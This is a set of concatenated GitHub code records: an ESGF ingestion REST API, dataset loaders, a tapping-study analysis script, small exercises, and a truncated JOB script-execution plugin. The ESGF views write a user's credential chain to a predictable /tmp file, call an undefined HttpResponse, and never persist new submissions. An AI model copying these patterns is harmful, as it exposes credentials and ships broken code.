env.step(action)\n\tenv.render()\n\n\n","repo_name":"danathughes/ReinforcementLearning","sub_path":"run_ppo.py","file_name":"run_ppo.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33080577663","text":"import os\nimport json\nimport subprocess\nimport urlparse\nfrom myproxy.client import MyProxyClient\nfrom OpenSSL import crypto\nfrom pyasn1.type import useful\nfrom datetime import datetime\nimport logging\n\nfrom pyramid.httpexceptions import (\n HTTPFound,\n HTTPNotFound,\n)\n\nfrom pyramid.response import Response\nfrom pyramid.view import (\n view_config,\n forbidden_view_config,\n )\n\nfrom pyramid.security import (\n remember,\n 
forget,\n authenticated_userid,\n )\n\nfrom sqlalchemy.exc import DBAPIError\n\nfrom .models import (\n DBSession,\n Publisher,\n Submission,\n SubmissionMetadata,\n SubmissionFacet,\n FacetName,\n FacetValue,\n )\n\nimport utils\nimport authentication\n\nfrom celery import result\n\nfrom backend import (\n celery_app,\n transfer,\n scan,\n publish,\n )\n\n\nlog = logging.getLogger(__name__)\n\n\n@view_config(route_name='home', renderer='json', permission='view')\ndef home(request):\n return Response('ESGF Ingestion REST API\\n')\n\n\n@view_config(route_name='authenticate', renderer='json', permission='view')\ndef authenticate(request):\n if request.method != 'POST':\n return Response('Error: GET is not supported')\n\n data = json.loads(request.body.decode('utf-8'))\n\n openid = data.get('openid')\n password = data.get('password')\n\n (server, username) = utils.decompose_openid(openid)\n\n # Get X.509 certificate chain from MyProxy server\n log.info(\"Getting X.509 certificate from %s for %s\" % (server, username))\n myproxy_client = MyProxyClient(hostname=server)\n cred_chain_pem_tuple = None\n try:\n cred_chain_pem_tuple = myproxy_client.logon(username, password, lifetime=7*24*3600)\n except Exception as e:\n request.response.status = 400\n return {'status': 'Error', 'message': '%s' % e}\n\n cred_chain_pem = ''\n for e in cred_chain_pem_tuple:\n cred_chain_pem += e\n cert_pem = cred_chain_pem_tuple[0]\n\n # Get 'Not After' date\n cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert_pem)\n not_after_asn1 = cert.get_notAfter()\n not_after = not_after_asn1.decode()\n dt = datetime.strptime(not_after, '%Y%m%d%H%M%SZ')\n\n # Check the publisher role in X509v3 extension 1.2.3.4.4.3.2.1.7.8\n if not authentication.is_publisher(openid, cert):\n request.response.status = 400\n return {'status': 'Error', 'message': 'The user does not have the publisher role'}\n\n\n # Store the X.509 certificate chain in a tmp file, so it can be used later by esgcet\n cred_file = open('/tmp/x509in_%s_%s' % (server, username), 'w')\n cred_file.write(cred_chain_pem)\n cred_file.close()\n\n # Add or update Publisher object in the database\n publisher = DBSession.query(Publisher).filter(Publisher.openid==openid).first()\n if publisher:\n publisher.x509_pem = cred_chain_pem\n publisher.expiration = dt\n else:\n publisher = Publisher(openid=openid, x509_pem=cred_chain_pem, expiration=dt)\n DBSession.add(publisher)\n\n # Save openid in auth_tk cookie\n headers = remember(request, openid)\n resp = Response()\n resp.headers = headers\n return resp\n\n\n@view_config(route_name='workflow_create', renderer='json', permission='publish')\ndef workflow_create(request):\n if request.method != 'POST':\n return Response('Error:')\n\n openid = authenticated_userid(request)\n publisher = DBSession.query(Publisher).filter(Publisher.openid==openid).first()\n data = json.loads(request.body.decode('utf-8'))\n\n log.info('openid: %s' % openid)\n log.info('data: %s' % data)\n\n submission = Submission()\n\n metadata = data.get('metadata')\n if metadata:\n for md in metadata:\n name = md.get('name')\n value = md.get('value')\n if name is not None and value is not None:\n submission.submission_metadata.append(SubmissionMetadata(name=name, value=value))\n\n facets_data = data.get('facets')\n if facets_data:\n submission_facets = {}\n for f in facets_data:\n fname = f.get('name')\n fvalue = f.get('value')\n submission_facets[fname] = fvalue\n\n project = submission_facets['project']\n if project is None:\n return {'status': 'Error', 
'message': 'Missing the \"project\" facet'}\n\n cert = crypto.load_certificate(crypto.FILETYPE_PEM, publisher.x509_pem)\n if not authentication.is_publisher(openid, cert, group=project, roles=['publisher']):\n return {'Error': '%s does not have the publisher role in the %s project' % (openid, project)}\n\n\n for fname in submission_facets:\n fvalue = submission_facets[fname]\n facet_name = DBSession.query(FacetName).filter(FacetName.name==fname).first()\n if facet_name is None:\n return { 'status': 'Error', 'message': \"Unknown facet name: '%s'\" % fname }\n facet_name = DBSession.query(FacetName).filter(FacetName.name==fname).first()\n facet_value = DBSession.query(FacetValue).filter(FacetValue.name_id==facet_name.id).filter(FacetValue.value==fvalue).first()\n if facet_value is None:\n facet_value = FacetValue(facet_name=facet_name, value=fvalue)\n sfacet = SubmissionFacet()\n facet_value.submission_facet.append(sfacet)\n submission.submission_facet.append(sfacet)\n\n return {'status': 'Success', 'submission_id': submission.id, 'message': 'The publication workflow has been created successfully'}\n\n\n@view_config(route_name='workflow_transfer', renderer='json', permission='publish')\ndef workflow_transfer(request):\n\n openid = request.authenticated_userid\n submission_id = request.matchdict['workflow_id']\n if request.method != 'POST':\n return HttpResponse('Error:')\n data = json.loads(request.body.decode('utf-8'))\n\n endpoint = data.get('endpoint')\n path = data.get('path')\n access_token = data.get('access_token')\n\n submission = DBSession.query(Submission).filter(Submission.id==submission_id).first()\n if submission is None:\n return {'status': 'Error', 'message': 'Wrong submission id: %s' % submission_id }\n\n if submission.task_id is not None:\n ar = result.AsyncResult(id=submission.task_id, app=celery_app)\n if ar.state != 'SUCCESS' and ar.state != 'FAILURE':\n return {'status': 'Running', 'message': 'Another task, %s, is still running' % submission.task_name }\n\n metadata = DBSession.query(SubmissionMetadata).\\\n filter(SubmissionMetadata.submission_id==submission_id).\\\n filter(SubmissionMetadata.name=='datanode').first()\n\n\n ar = transfer.delay(openid=openid, datanode=metadata.value, submission_id='%s' % submission.id)\n submission.task_id = ar.id\n submission.task_name = 'transfer'\n if path:\n submission.path = path\n\n return {'status': 'Success', 'message': 'Scan task %s started successfully' % ar.id }\n\n\n@view_config(route_name='workflow_scan', renderer='json', permission='publish')\ndef workflow_scan(request):\n\n openid = request.authenticated_userid\n submission_id = request.matchdict['workflow_id']\n if request.method != 'POST':\n return HttpResponse('Error:')\n data = json.loads(request.body.decode('utf-8'))\n\n path = data.get('path')\n\n\n submission = DBSession.query(Submission).filter(Submission.id==submission_id).first()\n if submission is None:\n return {'status': 'Error', 'message': 'Wrong submission id: %s' % submission_id }\n\n if submission.task_id is not None:\n ar = result.AsyncResult(id=submission.task_id, app=celery_app)\n if ar.state != 'SUCCESS' and ar.state != 'FAILURE':\n return {'status': 'Running', 'message': 'Another task, %s, is still running' % submission.task_name }\n\n metadata = DBSession.query(SubmissionMetadata).\\\n filter(SubmissionMetadata.submission_id==submission_id).\\\n filter(SubmissionMetadata.name=='datanode').first()\n\n facets = DBSession.query(FacetName, FacetValue, SubmissionFacet).\\\n 
filter(FacetName.id==FacetValue.name_id).\\\n filter(FacetValue.id==SubmissionFacet.value_id).\\\n filter(SubmissionFacet.submission_id==submission_id).order_by(FacetName.id).all()\n\n # Start a scan process for the specified workflow and facets\n fnv = []\n for fname, fvalue, sfacet in facets:\n fnv.append({ 'name': fname.name, 'value': fvalue.value })\n log.info('%d: %s:%s' % (submission.id, fname.name, fvalue.value))\n\n ar = scan.delay(openid=openid, submission_id='%s' % submission.id, facets=fnv, path=path)\n submission.task_id = ar.id\n submission.task_name = 'scan'\n if path:\n submission.path = path\n\n return {'status': 'Success', 'message': 'Scan task %s started successfully' % ar.id }\n\n\n@view_config(route_name='workflow_publish', renderer='json', permission='publish')\ndef workflow_publish(request):\n\n openid = request.authenticated_userid\n (server, username) = utils.decompose_openid(openid)\n\n submission_id = request.matchdict['workflow_id']\n\n submission = DBSession.query(Submission).filter(Submission.id==submission_id).first()\n if submission is None:\n return {'status': 'Error', 'message': 'Wrong submission id: %s' % submission_id }\n\n if submission.task_id is not None:\n ar = result.AsyncResult(id=submission.task_id, app=celery_app)\n if ar.state != 'SUCCESS' and ar.state != 'FAILURE':\n return {'status': 'Running', 'message': 'Another task, %s, is still running' % submission.task_name }\n\n metadata = DBSession.query(SubmissionMetadata).\\\n filter(SubmissionMetadata.submission_id==submission_id).\\\n filter(SubmissionMetadata.name=='datanode').first()\n\n ar = publish.delay(openid=openid, datanode=metadata.value, submission_id='%s' % submission.id, path=submission.path)\n submission.task_id = ar.id\n submission.task_name = 'publish'\n\n return {'status': 'Success', 'message': 'Publish task %s started successfully' % ar.id }\n\n\n@view_config(route_name='workflow_status', renderer='json', permission='publish')\ndef workflow_status(request):\n submission_id = request.matchdict['workflow_id']\n\n submission = DBSession.query(Submission).filter(Submission.id==submission_id).first()\n if submission is None:\n return {'status': 'Error', 'message': 'Wrong submission id: %s' % submission_id }\n\n if submission.task_id is None:\n return { 'status': 'Error', 'message': 'No task has been submitted yet' }\n\n ar = result.AsyncResult(id=submission.task_id, app=celery_app)\n if ar.state != 'SUCCESS' and ar.state != 'FAILURE':\n return {'status': 'Running', 'message': 'Task %s is still running' % submission.task_name }\n\n r = ar.get()\n return r\n\n\n","repo_name":"lukaszlacinski/esgf-ingestion","sub_path":"ingestion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37329440630","text":"num = int(input())\nstart = num - (len(str(num)) * 9)\nstart = 1 if start < 1 else start\n\nans = 0\nfor i in range(start, num+1):\n res = sum(map(int, str(i)))\n if num == (i + res):\n ans = i\n break\nprint(ans)\n","repo_name":"choiyezz/BOJ","sub_path":"Bronze2/B2_2231.py","file_name":"B2_2231.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13514445650","text":"import os\nimport torch\nfrom PIL import Image\nfrom xml.etree.ElementTree import parse\nfrom torch.utils.data.dataset import Dataset\nfrom torchvision import transforms\n\nclass 
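# The BOJ 2231 record above only scans from n - 9*len(str(n)) upward: each
# digit adds at most 9 to the digit sum, so no smaller number can generate n.
# A sketch of the same search (smallest_generator is a hypothetical name):
def smallest_generator(n):
    start = max(1, n - 9 * len(str(n)))
    for i in range(start, n + 1):
        if i + sum(map(int, str(i))) == n:
            return i
    return 0   # n has no generator

assert smallest_generator(216) == 198   # 198 + 1 + 9 + 8 == 216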
sixrayDataset(Dataset):\n CLASS_NAME = ['BACKGROUND','Gun', 'Knife', 'Wrench', 'Pliers', 'Scissors', 'Hammer']\n def __init__(self, sixray_folder, mode):\n self.sixray_folder = sixray_folder\n self.mode = mode # 'train' or 'eval'\n\n self.image_folder = os.path.join(self.sixray_folder, self.mode, 'image')\n self.annotation_folder = os.path.join(self.sixray_folder, self.mode, 'annotation')\n\n self.transform = transforms.Compose([\n transforms.ToTensor(),\n ])\n\n def __len__(self):\n return len(os.listdir(self.annotation_folder))\n \n def __getitem__(self, index):\n annotation_file_name = os.listdir(self.annotation_folder)[index]\n annotation_file = os.path.join(self.annotation_folder, annotation_file_name)\n\n tree = parse(annotation_file)\n root = tree.getroot()\n \n # image info\n image_filename = root.findtext(\"filename\")\n image_width = root.find('size').findtext('width')\n image_height = root.find('size').findtext('height')\n \n image_file = os.path.join(self.image_folder, image_filename)\n image = Image.open(image_file).convert(\"RGB\")\n image = self.transform(image)\n\n # object info \n objs = root.findall('object')\n boxes = []\n for obj in objs :\n obj_name = obj.findtext('name')\n if obj_name == None : continue \n obj_index = sixrayDataset.CLASS_NAME.index(obj_name)\n \n x1 = float(obj.find('bndbox').findtext('xmin'))\n y1 = float(obj.find('bndbox').findtext('ymin'))\n x2 = float(obj.find('bndbox').findtext('xmax'))\n y2 = float(obj.find('bndbox').findtext('ymax'))\n box = [x1, y1, x2, y2]\n \n boxes.append([obj_index, box])\n \n # boxes = torch.as_tensor(boxes, dtype=torch.float32)\n \n image_id = int(image_filename[1:].split('.jpg')[0]) # Only use for evaluate \n\n return image, boxes, image_id","repo_name":"JungminChung/fasterRCNN","sub_path":"datasets/SIXray.py","file_name":"SIXray.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29419170139","text":"\n#### Evaluate the Accuracy of the preferred period calculations\n\n##############################\n### Imports\n###############################\n\n# Warning Supression\nimport warnings\nwarnings.simplefilter(\"ignore\")\n\n# Standard I/O and Data Handling\nimport pandas as pd\nimport numpy as np\nimport os, glob, sys\nimport datetime\nimport copy\nimport pickle\n\n# Data Loading\nfrom scripts.libraries.helpers import load_pickle, dump_pickle, load_tapping_data\n\n# Detection\nfrom scripts.libraries.tap_detection import find_taps\n\n# Plotting\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rcParams\n\n###############################\n### Plot Helpers\n###############################\n\n## Plotting Variables\nstandard_fig = (10,5.8)\nplot_dir = \"./plots/\"\nrcParams[\"errorbar.capsize\"] = 5\n\n###############################\n### General Helpers\n###############################\n\n## Bootstrapped Confidence Interval\ndef bootstrap_ci(values,\n alpha = 0.05,\n func = np.mean,\n sample_percent = 70,\n samples = 100,\n replace = False):\n processed_vals = []\n values = np.array(values)\n for sample in range(samples):\n sample_vals = np.random.choice(values, int(values.shape[0] * sample_percent/100.), replace = replace)\n processed_vals.append(func(sample_vals))\n return np.percentile(processed_vals, [alpha*100/2, 50, 100. 
- (alpha*100/2)])\n\n###############################\n### Load Data\n###############################\n\n# Main Data Directory\ndata_dir = \"./data/\"\n\n# Tapping Data Directory\ntapping_data_dir = data_dir + \"tapping/\"\n\n# Tapping Filenames\ntapping_filenames = glob.glob(tapping_data_dir + \"*/*\")\ntapping_filenames = [tapping_filenames[i] for i in np.argsort([int(t.split(\"/\")[-1].replace(\".mat\",\"\")) for t in tapping_filenames])]\n\n# Load all data into memory\ntapping_data = {}\nfor subject_file in tapping_filenames:\n ## Extract subject ID from the filename\n subject_id = int(subject_file.split(\"/\")[-1].replace(\".mat\",\"\"))\n ## Load data and add to cache\n subject_data = load_tapping_data(subject_file)\n ## Get Preferred Period Calibration Signal and Estimated PP\n pref_force = subject_data[\"preferred_force\"]\n pref_period_calc = subject_data[\"preferred_period_online\"]\n ## Cache\n tapping_data[subject_id] = {\"data\":pref_force, \"preferred_period\":pref_period_calc}\n\n## Load Merged Results to See Which Subjects Were Kept\nresults_df = pd.read_csv(\"./data/processed_results.csv\")\n\n###############################\n### Calculations\n###############################\n\n# Store for processed taps\ncache_file = \"./data/preferred_periods.pickle\"\nprocessed_taps = {}\nif os.path.exists(cache_file):\n processed_taps = load_pickle(cache_file)\n\n# Process\nfor subject, data in tapping_data.items():\n\n if subject in processed_taps:\n continue\n\n ## Estimate Taps\n est_taps = find_taps(data[\"data\"],\n expected_intertapinterval = 1000)\n\n # Note the starting number of taps\n starting_tap_init_length = len(est_taps)\n\n # Interactive Removal Procedure\n filtering_complete = False\n while not filtering_complete:\n\n # Define function to manually remove identified taps\n def onclick(event):\n global ix, iy\n ix, iy = event.xdata, event.ydata\n # assign global variable to access outside of function\n global coords\n coords.append((ix, iy))\n # Disconnect after 2 clicks\n if len(coords) == 2:\n fig.canvas.mpl_disconnect(cid)\n plt.close(1)\n\n # Separate by condition and compute ITIs\n itis = np.diff(est_taps)\n\n # Create Plot\n fig, ax = plt.subplots(2,1, sharex = False, figsize = (14,6))\n ax[0].plot(data[\"data\"])\n ax[0].vlines(est_taps, ax[0].get_ylim()[0]-0.05, ax[0].get_ylim()[1],\n color = \"red\", linewidth = .75, linestyle = \"--\")\n t1 = ax[1].plot(np.arange(len(itis)), itis)\n t2 = ax[1].scatter(np.arange(len(itis)), itis, color = \"red\", s = 20, marker = \"o\")\n ax[1].axvline(len(itis) - .5, color = \"black\", linestyle = \"--\")\n fig.tight_layout()\n\n # Interact with Plot and Store Chosen Coordinates\n coords = []\n cid = fig.canvas.mpl_connect('button_press_event', onclick)\n plt.show(1)\n\n # Remove taps within selected interval\n start_len, end_len = 0, 0\n if len(coords) > 1:\n cmin, cmax = coords[0][0], coords[1][0]\n start_len = len(est_taps)\n est_taps = est_taps[np.logical_not((est_taps >= cmin ) & (est_taps <= cmax))]\n end_len = len(est_taps)\n else:\n filtering_complete = True\n continue\n\n # Check for continuation\n if start_len == end_len:\n filtering_complete = True\n else:\n keep_filtering = input(\"Continue filtering? 
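# ---------------------------------------------------------------------------\n# Aside: the click-capture pattern used by the interactive tap-removal loop\n# above, isolated into a runnable sketch (the plotted data is a placeholder).\n# Connect a callback, collect two clicks, then disconnect and close.\nimport matplotlib.pyplot as plt\n_clicks = []\n_fig, _ax = plt.subplots()\n_ax.plot([0, 1, 2], [0, 1, 0])\ndef _on_click(event):\n    # event.xdata/ydata are None for clicks outside the axes\n    if event.xdata is not None:\n        _clicks.append((event.xdata, event.ydata))\n    if len(_clicks) == 2:  # stop listening after two clicks\n        _fig.canvas.mpl_disconnect(_cid)\n        plt.close(_fig)\n_cid = _fig.canvas.mpl_connect('button_press_event', _on_click)\n# plt.show()  # uncomment to interact; _clicks then bounds the removal interval\n# ---------------------------------------------------------------------------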
\")\n if len(keep_filtering) == 0:\n filtering_complete = True\n\n # Discard Check\n final_check = \"\"\n filtered_original = False\n if starting_tap_init_length != len(est_taps):\n\n # Flag to note that taps were filtered\n filtered_original = True\n\n # Show Final Result\n fig, ax = plt.subplots(figsize=(12,6))\n ax.plot(data[\"data\"])\n ax.vlines(est_taps, ax.get_ylim()[0], ax.get_ylim()[1], color = \"red\", linewidth = .75, linestyle = \"--\")\n fig.tight_layout()\n plt.show(block=False)\n\n # Ask user to validate final filtering\n final_check = input(\"Discard? If yes, why? \")\n\n # Double check plot is closed\n plt.close(\"all\")\n\n # Save results\n discard_reason = None\n if len(final_check) > 0:\n discard_reason = final_check\n est_taps = None\n processed_taps[subject] = {\"tap_initiations\":est_taps, \"discard_reason\":discard_reason, \"filtered\":filtered_original}\n\n## Dump\ndump_pickle(processed_taps, cache_file)\n\n###############################\n### Comparisons\n###############################\n\n## Extract Preferred Periods\npp_online = pd.DataFrame([[sub, data[\"preferred_period\"]] for sub, data in tapping_data.items()],\n columns = [\"subject\",\"preferred_period_online\"])\n\n## Calculate PP from Tap Initiations\ndef calc_pp(tap_inits,\n sample_rate = 2000,\n **bootstrap_kwargs):\n \"\"\"\n\n \"\"\"\n if tap_inits is None or len(tap_inits) < 3:\n return None, 0, (None,None,None)\n tap_mask = np.logical_and(tap_inits >= 5 * sample_rate, tap_inits <= 15 * sample_rate)\n tap_mask = np.nonzero(tap_mask)[0]\n if len(tap_mask) == 1:\n return None, 0, (None,None,None)\n tap_diffs = np.diff(tap_inits[tap_mask])\n pp = np.mean(tap_diffs) / sample_rate\n conf_int = bootstrap_ci(tap_diffs / sample_rate, **bootstrap_kwargs)\n return pp, len(tap_mask), tuple(conf_int)\n\n## Execute Calculation\npp_online[\"pp_stats\"] = pp_online.subject.map(lambda i: calc_pp(processed_taps[i][\"tap_initiations\"]))\nfor c, col in enumerate([\"preferred_period_offline\",\"offline_iti_count\",\"pp_confidence_interval\"]):\n pp_online[col] = pp_online[\"pp_stats\"].map(lambda i: i[c])\npp_online.drop([\"pp_stats\"],axis=1,inplace=True)\n\n## Add flag to note whether the subject was kept in the final analysis\npp_online[\"subject_kept\"] = pp_online.subject.isin(results_df.subject)\n\n## Correlation\nkept_corr = pp_online.loc[pp_online.subject_kept].drop([\"subject\",\"subject_kept\",\"offline_iti_count\",\"pp_confidence_interval\"],axis=1).corr()\ndiscarded_corr = pp_online.loc[~pp_online.subject_kept].drop([\"subject\",\"subject_kept\",\"offline_iti_count\",\"pp_confidence_interval\"],axis=1).corr()\n\n## Difference\npp_online[\"calculation_difference\"] = pp_online[\"preferred_period_online\"] - pp_online[\"preferred_period_offline\"]\n\n## Plot Correlation\nfig, ax = plt.subplots()\npp_online.loc[pp_online.subject_kept].plot.scatter(\"preferred_period_online\",\n \"preferred_period_offline\",\n ax = ax,\n label = \"Kept (Pearson $r = {:,.3f}$)\".format(kept_corr.values[1,0]),\n color = \"C0\")\npp_online.loc[~pp_online.subject_kept].plot.scatter(\"preferred_period_online\",\n \"preferred_period_offline\",\n ax = ax,\n label = \"Discarded (Pearson $r = {:,.3f}$)\".format(discarded_corr.values[1,0]),\n color = \"C1\")\nplt.plot([ax.get_xlim()[0], ax.get_xlim()[1]],\n [ax.get_xlim()[0], ax.get_xlim()[1]],\n color = \"black\",\n alpha = .3,\n linestyle = \"--\")\nplt.xlabel(\"Online Calculation (s)\")\nplt.ylabel(\"Offline Calculation (s)\")\nplt.legend(loc = \"upper left\", 
frameon=False)\nplt.tight_layout()\nplt.savefig(\"./plots/methodology/preferred_period_scatter_comparison.png\")\nplt.close()\n\n## Histogram of Differences\nfig, ax = plt.subplots()\npp_online.calculation_difference.hist(bins = 50, ax = ax, zorder = 5)\nax.set_xlabel(\"Online Calculation minus Offline Calculation (s)\")\nax.set_ylabel(\"# of Subjects\")\nplt.tight_layout()\nplt.savefig(\"./plots/methodology/preferred_period_online_offline_difference_histogram.png\")\nplt.close()\n\n## Number of Recognized ITIs vs. PP\nfig, ax = plt.subplots()\npp_online.loc[pp_online.subject_kept].plot.scatter(\"offline_iti_count\",\n                                                   \"preferred_period_offline\",\n                                                   ax=ax,\n                                                   label = \"Kept\",\n                                                   color = \"C0\")\npp_online.loc[~pp_online.subject_kept].plot.scatter(\"offline_iti_count\",\n                                                    \"preferred_period_offline\",\n                                                    ax=ax,\n                                                    label = \"Discarded\",\n                                                    color = \"C1\")\n\nplt.show()\n\n## Calculate Whether Subject's Online Period Fell within Bootstrapped Range\nin_range = lambda row: row[\"preferred_period_online\"] <= row[\"pp_confidence_interval\"][2] and \\\n                       row[\"preferred_period_online\"] >= row[\"pp_confidence_interval\"][0] if \\\n                       (not pd.isnull(row[\"preferred_period_online\"]) and \\\n                       not any(i is None for i in row[\"pp_confidence_interval\"])) else \\\n                       False\npp_online[\"online_in_range\"] = pp_online.apply(in_range, axis = 1)\n\n## Within Variation Range (Preferred Period Confidence Interval)\nconf_ints = pp_online.sort_values(\"preferred_period_online\").dropna().pp_confidence_interval.values\nonline_calc = pp_online.sort_values(\"preferred_period_online\").dropna().preferred_period_online.values\nfig, ax = plt.subplots()\nfor i, (val_conf, val_online) in enumerate(zip(conf_ints, online_calc)):\n    ax.vlines(i, val_conf[0], val_conf[2], color = \"C0\")\n    ax.scatter(i,\n               val_online,\n               color = \"black\" if val_online <= val_conf[2] and val_online >= val_conf[0] else \"red\",\n               s = 10,\n               zorder = 10)\nplt.show()\n\n###############################\n### Subject-Filtering\n###############################\n\n\"\"\"\nSubjects who were given trials based on a preferred period online\ncalculation that differed substantially from the offline calculation\nare flagged for removal here (since their data might not represent\nnormal behavior)\n\"\"\"\n\n## Calculate Absolute Difference (Relative to Offline Calculation)\npp_online[\"rel_difference\"] = (pp_online[\"calculation_difference\"] / pp_online[\"preferred_period_offline\"]) * 100\npp_online[\"absolute_rel_difference\"] = np.abs(pp_online[\"rel_difference\"])\n\n## Difference Cumulative Distribution\naxes = pp_online.hist(\"absolute_rel_difference\",\n                      by = \"subject_kept\",\n                      cumulative = True,\n                      bins = list(np.arange(0,101)) + [pp_online.absolute_rel_difference.max() +1],\n                      histtype = \"step\")\naxes[0].set_title(\"Subjects Discarded Already\")\naxes[1].set_title(\"Subjects Currently Kept\")\nfor a in axes:\n    a.set_xlabel(\"Relative Difference Threshold\")\n    a.set_ylabel(\"# Subjects After Removal\")\nplt.show()\n\n## Boundaries\ndef show_boundaries_at_difference_threshold(threshold,\n                                            show = True):\n    \"\"\"\n    Create a scatter plot of online/offline preferred period calculations. Show\n    filtering boundary and compute the number of subjects removed under a given\n    threshold\n\n    Args:\n        threshold (numeric): Percentage (100 scale) to use for relative absolute difference\n        show (bool): If True, show the plot. 
Otherwise, return the figure\n\n Returns:\n None or fig, ax combo (depending on the `show` parameter)\n \"\"\"\n fig, ax = plt.subplots()\n ax.scatter(pp_online.loc[pp_online.subject_kept][\"preferred_period_offline\"],\n pp_online.loc[pp_online.subject_kept][\"preferred_period_online\"],\n s = 50,\n alpha = .3,\n color = \"C0\",\n label = \"Currently Kept\")\n ax.scatter(pp_online.loc[~pp_online.subject_kept][\"preferred_period_offline\"],\n pp_online.loc[~pp_online.subject_kept][\"preferred_period_online\"],\n s = 50,\n alpha = .3,\n color = \"C1\",\n label = \"Currently Discarded\")\n xlim = list(ax.get_xlim())\n ax.plot(xlim,\n xlim,\n color = \"black\",\n alpha = .3,\n linestyle = \"-\",\n label = \"Match\")\n ax.plot(xlim,\n np.array(xlim) * (100 + threshold) / 100.,\n alpha = .3,\n color = \"red\",\n linestyle = \"--\")\n ax.plot(xlim,\n np.array(xlim) * (100 - threshold) / 100.,\n alpha = .3,\n color = \"red\",\n linestyle = \"--\",\n label = \"Boundary at {}%\".format(threshold))\n ax.legend(loc = \"lower right\", frameon = False, fontsize = 8)\n rem_tot = (pp_online.absolute_rel_difference >= threshold).sum()\n rem_new = (pp_online.loc[pp_online.subject_kept].absolute_rel_difference >= threshold).sum()\n ax.set_title(\"{} Subjects Removed ({} new)\".format(rem_tot, rem_new))\n ax.set_xlabel(\"Offline Preferred Period (s)\")\n ax.set_ylabel(\"Online Preferred Period (s)\")\n fig.tight_layout()\n if show:\n plt.show()\n else:\n return fig, ax\n\n## Plot Filtering\nfig, ax = show_boundaries_at_difference_threshold(5, False)\nfig.savefig(\"./plots/methodology/pp_filtering_boundaries.png\")\nplt.close()\n\n## Create Filter Table Data Cache for `statistical_testing.py` script\nfilter_cache_file_out = \"./data/preferred_period_filtering_map.csv\"\npp_online[[\"subject\",\"rel_difference\",\"absolute_rel_difference\",\"online_in_range\"]].to_csv(filter_cache_file_out,index=False)\n","repo_name":"kharrigian/pitchers-and-pianists","sub_path":"scripts/evaluate_preferred_period_calculations.py","file_name":"evaluate_preferred_period_calculations.py","file_ext":"py","file_size_in_byte":15130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13450238000","text":"# 딕셔너리에 값 추가하기/제거하기\n# dictionary[new key] = new value\ndictionary = {\n \"name\": \"7D 건조 망고\",\n \"type\": \"당절임\",\n \"ingredient\": [\"망고\", \"설탕\", \"메타중아황산나트륨\", \"치자황색소\"],\n \"origin\": \"필리핀\"\n}\ndictionary[\"price\"] = 5000\ndel dictionary[\"ingredient\"]\nprint(dictionary)","repo_name":"shinjian/Study","sub_path":"10_Dictionary/dict03.py","file_name":"dict03.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26527178037","text":"import base64\nfrom functools import partial\n\nfrom django.utils import translation\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom pipeline.core.flow.io import (\n StringItemSchema,\n ObjectItemSchema,\n BooleanItemSchema,\n)\nfrom pipeline.component_framework.component import Component\nfrom pipeline_plugins.components.collections.sites.open.job import JobService\nfrom pipeline_plugins.components.collections.sites.open.job.ipv6_base import GetJobTargetServerMixin\nfrom pipeline_plugins.components.utils import get_job_instance_url, get_node_callback_url\n\nfrom gcloud.conf import settings\nfrom gcloud.constants import JobBizScopeType\nfrom gcloud.utils.handlers import handle_api_error\n\n__group_name__ = 
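# ---------------------------------------------------------------------------\n# Aside: the subject-filtering rule from the preferred-period script above in\n# miniature -- flag rows whose online and offline estimates disagree by more\n# than a threshold percentage. The frame is synthetic and the 5% cut mirrors\n# the plotted boundary, but both are assumptions here.\nimport pandas as pd\n_df = pd.DataFrame({'online': [0.50, 0.61, 0.55], 'offline': [0.52, 0.50, 0.55]})\n_df['abs_rel_diff'] = ((_df['online'] - _df['offline']) / _df['offline']).abs() * 100\n_flagged = _df[_df['abs_rel_diff'] >= 5]  # subjects to discard\n# row 1 (0.61 vs 0.50 -> 22%) is flagged; rows 0 (~3.8%) and 2 (0%) survive\n# ---------------------------------------------------------------------------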
_(\"作业平台(JOB)\")\n\nget_client_by_user = settings.ESB_GET_CLIENT_BY_USER\n\njob_handle_api_error = partial(handle_api_error, __group_name__)\n\n\nclass JobFastExecuteScriptService(JobService, GetJobTargetServerMixin):\n need_get_sops_var = True\n\n def inputs_format(self):\n return [\n self.InputItem(\n name=_(\"业务 ID\"),\n key=\"biz_cc_id\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"当前操作所属的 CMDB 业务 ID\")),\n ),\n self.InputItem(\n name=_(\"脚本来源\"),\n key=\"job_script_source\",\n type=\"string\",\n schema=StringItemSchema(\n description=_(\"待执行的脚本来源,手动(manual),业务脚本(general),公共脚本(public)\"),\n enum=[\"manual\", \"general\", \"public\"],\n ),\n ),\n self.InputItem(\n name=_(\"脚本类型\"),\n key=\"job_script_type\",\n type=\"string\",\n schema=StringItemSchema(\n description=_(\"待执行的脚本类型:shell(1) bat(2) perl(3) python(4) powershell(5)\" \",仅在脚本来源为手动时生效\"),\n enum=[\"1\", \"2\", \"3\", \"4\", \"5\"],\n ),\n ),\n self.InputItem(\n name=_(\"脚本内容\"),\n key=\"job_content\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"待执行的脚本内容,仅在脚本来源为手动时生效\")),\n ),\n self.InputItem(\n name=_(\"公共脚本\"),\n key=\"job_script_list_public\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"待执行的公共脚本 ID,仅在脚本来源为公共脚本时生效\")),\n ),\n self.InputItem(\n name=_(\"业务脚本\"),\n key=\"job_script_list_general\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"待执行的业务脚本 ID,仅在脚本来源为业务脚本时生效\")),\n ),\n self.InputItem(\n name=_(\"脚本执行参数\"),\n key=\"job_script_param\",\n type=\"string\",\n schema=StringItemSchema(description=_(\"脚本执行参数\")),\n ),\n self.InputItem(\n 